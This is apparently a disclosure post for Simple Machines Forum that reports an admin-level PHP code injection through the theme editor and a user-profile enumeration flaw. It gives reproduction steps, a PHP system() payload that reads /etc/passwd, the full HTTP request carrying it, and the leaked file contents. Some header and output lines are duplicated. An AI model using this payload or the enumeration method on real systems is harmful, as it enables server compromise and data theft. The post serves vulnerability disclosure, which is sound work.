Description
- It was found that the application is suffering from code injection vulnerability
- The flaw allows the attacker to inject PHP statements which can then execute code via the the vulnerable application
- Furthermore the application is vulnerable IDOR (Insecure Direct Object References) allowing to enumerate user profiles based on their user ID
Code Injection
Steps to Reproduce:
- Login as admin
- Browse to "Current Theme"
- Click on "Modify Themes" > "SMF Default Theme"
- Click on Admin.template.php
- In the first box enter the PHP payload "<?php system('cat /etc/passwd') ?>"
// HTTP POST request showing the code injection payload
POST /SMFdbwci7dy0o/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
[...]
entire_file[]=<?php+system('cat /etc/passwd') ?>[...]
// HTTP response showing /etc/passwd contents
HTTP/1.1 200 OK
Server: Apache
Server: Apache
[...]
[...]
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[...]
IDOR
Steps to Reproduce:
- Go to forum and click online user e.g. Administrator
- Send the HTTP GET request to Burpsuite Intruder
- Check the results that for valid user ID profile the response is HTTP OK 200
- The response for invalid profile is HTTP 403 Forbidden
No comments:
Post a Comment